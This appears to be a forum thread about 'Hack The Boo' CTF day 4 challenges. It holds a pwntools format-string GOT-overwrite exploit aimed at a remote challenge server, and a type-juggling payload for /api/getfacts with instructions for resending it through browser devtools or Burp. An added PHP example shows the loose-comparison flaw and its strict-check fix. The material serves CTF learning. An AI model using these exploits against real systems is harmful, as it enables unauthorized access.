[Hack The Boo] Day 4 Challenges
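```
from pwn import *

# Load the target ELF so pwntools can resolve its GOT entries
context.binary = binary = ELF("./spooky_time", checksec=False)

# Address of the puts entry in the GOT
got_puts_address = binary.got.puts

junk_payload = b"A" * 0x2963

# Format string using %n / %hn writes, followed by two addresses
# inside the puts GOT entry (entry + 2, then the entry itself)
payload = b"%64X%11$n" + b"%4063X%8$hnAAA" + p64(got_puts_address + 2) + p64(got_puts_address)

p = remote("167.71.138.188", 31648)
p.send(junk_payload)
p.send(payload)
p.interactive()
```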

Can someone fix it and help me out with pwn? Looks like a GOT overwrite D:
Reply
thanks again
Reply
POST /api/getfacts

{"type":true}

How can I use this? I am really sorry, but I am new to CTFs and I am trying to understand. Is it a script? Terminal? How can I use this?
Reply
(October 26, 2022, 03:41 AM)P1blicEnemy Wrote: POST /api/getfacts

{"type":true}


How can I use this? I am really sorry, but I am new to CTFs and I am trying to understand. Is it a script? Terminal? How can I use this?


Open the webpage. Press F12 to open Developer Tools. Click the Network tab and reload. See the "fetch" or 200 POST request to /api/getfacts? Click it. On the right of dev tools, you will see headers, cookies, request, response, timings, stack trace, etc. Click Request and see that the request payload is {"type": "spooky"}. This is vulnerable to type juggling. Right click on the 200 request this time, and click 'edit and resend.' Now, you can modify the request body and click send.
Reply
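Why a boolean in the `type` field matters, shown as an added example that is not part of any post in this thread or of the challenge's code. It assumes a PHP backend that routes on `type` with a `switch` (which compares with loose `==`); the function names and the `restricted` category are hypothetical.

```php
<?php
// Added illustration; handler, function names and the "restricted"
// category are hypothetical, not taken from the challenge.

// Weak: switch compares with ==, so a JSON boolean true equals any
// non-empty string and falls into whichever case is listed first.
function pick_category_loose($type) {
    switch ($type) {
        case 'restricted': return 'restricted';
        case 'spooky':     return 'spooky';
        default:           return 'invalid';
    }
}

// Hardened: require a string, then compare strictly against an allowlist
// of categories that any client may request.
function pick_category_strict($type) {
    $allowed = ['spooky'];
    if (!is_string($type) || !in_array($type, $allowed, true)) {
        return 'invalid';
    }
    return $type;
}

// Constructed request bodies, decoded the way a JSON API would decode them.
foreach (['{"type":"spooky"}', '{"type":true}'] as $body) {
    $type = json_decode($body, true)['type'] ?? null;
    printf("%-18s loose=%-10s strict=%s\n",
        $body, pick_category_loose($type), pick_category_strict($type));
}
```

On the server side, the type check plus strict comparison (or PHP 8's `match`, which uses `===`) is what closes the gap; logging requests whose `type` is not a string is a cheap way to spot probing.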
Thanks
Reply
(October 26, 2022, 03:41 AM)P1blicEnemy Wrote: POST /api/getfacts

{"type":true}


How can I use this? I am really sorry, but I am new to CTFs and I am trying to understand. Is it a script? Terminal? How can I use this?

It's easy, use Burp to capture the request and modify it.
Reply
😁
Reply
(October 25, 2022, 01:05 PM)Hacker2222 Wrote: plz discuss day 4 challenges here

reversing challenge:


a
Reply
thx you
Reply
(October 25, 2022, 01:05 PM)Hacker2222 Wrote: plz discuss day 4 challenges here

reversing challenge:


thanks
Reply